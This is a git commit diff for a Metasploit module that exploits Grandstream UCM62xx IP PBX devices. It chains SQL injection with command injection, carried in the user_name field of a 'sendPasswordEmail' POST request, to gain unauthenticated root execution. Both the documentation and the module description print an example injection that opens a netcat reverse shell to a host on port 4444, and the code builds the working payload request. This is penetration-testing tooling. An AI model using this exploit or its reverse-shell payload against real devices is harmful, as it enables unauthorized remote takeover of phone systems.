Addressed multiple review comments (spelling, doc details, randomization, etc)

2022-01-22 14:09:58 -08:00 · 2022-01-22 14:09:58 -08:00 · 2c989ec714
parent 4ebb702405
commit 2c989ec714
2 changed files with 48 additions and 27 deletions
--- a/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
+++ b/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
@ -2,21 +2,35 @@

 ### Description

-This module exploits unauthenticated SQL and command injection vulnerabilities affecting
-the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an
-unauthenticated and remote attacker to execute commands as root. This module affects
-UCM62xx versions before firmware version 1.0.19.20.
+This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
+a command injection vulnerability (technically, no assigned CVE but was inadvertently
+patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
+series of devices. The vulnerabilities allow an unauthenticated and remote attacker to
+execute commands as `root`.
+
+Exploitation happens in two stages:
+
+1. An SQL injection during username lookup while executing the "Forgot Password" function.
+2. After successful SQL injection the user provided username is passed to a python script
+    via the shell. Like so:
+
+```
+  /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
+    password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
+```
+
+This module affect UCM62xx versions before firmware version 1.0.19.20.

 ### Installation

-The UCM62xx PBX is a physical device and is not known to be succesfully emulated.
+The UCM62xx PBX is a physical device and is not known to have been successfully emulated.
 However, if you have a device, affected firmware can be downloaded here:

 * https://firmware.grandstream.com/Release_UCM62xx_1.0.18.13.zip

 ## Verification Steps

-* Acquire an affected device and configure with affected firmware
+* Acquire an affected device and configure it with the affected firmware
 * Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce`
 * Do: `set RHOST <ip>`
 * Do: `check`
@ -30,11 +44,11 @@ However, if you have a device, affected firmware can be downloaded here:

 ### 0

-By default, this targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
+This targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.

 ### 1

-By default, this target obtains a meterpreter session using `wget`.
+This target obtains a meterpreter session using `wget`.

 ## Options

@ -103,7 +117,7 @@ Revision	: 63015
 Serial		: 1126b9d4eacb275c
 ```

-### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat.
+### Grandstream UCM6202 IP PBX firmware version 1.0.18.13. Get reverse shell using netcat.

 ```
 msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
--- a/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
+++ b/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
@ -16,10 +16,22 @@ class MetasploitModule < Msf::Exploit::Remote
        info,
        'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE',
        'Description' => %q{
-          This module exploits unauthenticated SQL and command injection vulnerabilities affecting
-          the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an
-          unauthenticated and remote attacker to execute commands as root. This module affects
-          UCM62xx versions before firmware version 1.0.19.20.
+          This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
+          a command injection vulnerability (technically, no assigned CVE but was inadvertently
+          patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
+          series of devices. The vulnerabilities allow an unauthenticated and remote attacker to
+          execute commands as root.
+
+          Exploitation happens in two stages:
+
+          1. An SQL injection during username lookup while executing the "Forgot Password" function.
+          2. After successful SQL injection the user provided username is passed to a python script
+          via the shell. Like so:
+
+          /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
+          password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
+
+          This module affect UCM62xx versions before firmware version 1.0.19.20.
        },
        'License' => MSF_LICENSE,
        'Author' => [
@ -55,10 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
-              'CmdStagerFlavor' => [ 'wget' ],
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
-              }
+              'CmdStagerFlavor' => [ 'wget' ]
            }
          ]
        ],
@ -95,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
  ###
  def check
    normalized_uri = normalize_uri(target_uri.path, '/cgi')
-    print_status("Requesting version information from #{normalized_uri}")
+    vprint_status("Requesting version information from #{normalized_uri}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalized_uri,
@ -107,20 +116,17 @@ class MetasploitModule < Msf::Exploit::Remote
    body_json = res.get_json_document
    return CheckCode::Unknown('No JSON in response') unless body_json

-    resp_json = body_json['response']
-    return CheckCode::Unknown('The JSON response is missing the response element') unless resp_json
+    prog_version = body_json.dig('response', 'prog_version')
+    return false if prog_version.nil?

-    prog_version = resp_json['prog_version']
-    return CheckCode::Unknown('The JSON response is missing the prog_version element') unless prog_version
-
-    print_status("The reported version is: #{prog_version}")
+    vprint_status("The reported version is: #{prog_version}")

    version = Rex::Version.new(prog_version)
    if version < Rex::Version.new('1.0.19.20')
-      return CheckCode::Appears('This determination is based on the version string.')
+      return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
    end

-    return CheckCode::Safe('This determination is based on the version string.')
+    return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
  end

  ##
@ -136,13 +142,14 @@ class MetasploitModule < Msf::Exploit::Remote
  # payloads are appropriate.
  ###
  def execute_command(cmd, _opts = {})
+    rand_num = Rex::Text.rand_text_numeric(1..5)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/cgi'),
      'vars_post' =>
      {
        'action' => 'sendPasswordEmail',
-        'user_name' => 'z\' or 1=1--`;`' + cmd + '`;`'
+        'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`"
      }
    }, 5)